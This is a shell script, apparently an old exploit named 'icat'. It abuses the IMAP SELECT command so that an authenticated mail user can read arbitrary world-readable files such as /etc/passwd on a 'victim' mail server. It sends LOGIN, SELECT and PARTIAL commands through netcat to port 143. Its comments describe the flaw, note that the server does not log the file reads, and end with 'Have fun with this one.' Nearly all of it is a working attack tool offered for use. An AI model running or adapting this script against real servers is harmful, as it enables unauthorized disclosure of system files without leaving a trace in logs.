#!/bin/sh
#
# icat by Jimmy J
#
# Required: 
#  nc (netcat) ftp://ftp.avian.org/src/hacks/nc110.tgz
#
# Example:
#  icat joe@imap.ftech.net passwd /etc/hosts.allow
#  icat bob@mailhost.cerbernet.co.uk banana1 /etc/passwd 640128
#
# Problem:
# Part of the whole point of imap is to let users manage their own seperate
# folders on a mail host server.  The SELECT feature does not restrict
# the user to their own files.
#
# Impact:
# An attacker with imap access can help himself to world readable files.
#
# Notes:
#
# This is useful for machines where you have a pop3 login only for example.
#
# As default imapd does not appear to log which files are being opened.
#
# Have fun with this one.
#

usage() {
	echo "Usage: `basename $0` <user@mail.victim.com> <password> [file] [bytes]" 1>&2
	exit 1
}

if echo $1 | grep "@" 1>/dev/null; then

luser=`echo $1 | cut -f1 -d @`
victim=`echo $1 | cut -f2 -d @`
passwd=$2
file=$3
bytes=$4

if [ -z $passwd ]; then
	usage
fi

if [ -z $file ]; then
	file=/etc/hosts.allow
fi

if [ -z $bytes ]; then
	bytes=32768
fi

echo "Trying $victim:143... [$file] [$bytes]"
(
echo "A00001 LOGIN $luser $passwd
A00002 SELECT $file
A00003 PARTIAL 1 RFC822.TEXT 1 $bytes
A00004 LOGOUT
"
) | nc -v $victim 143

else
	usage
fi

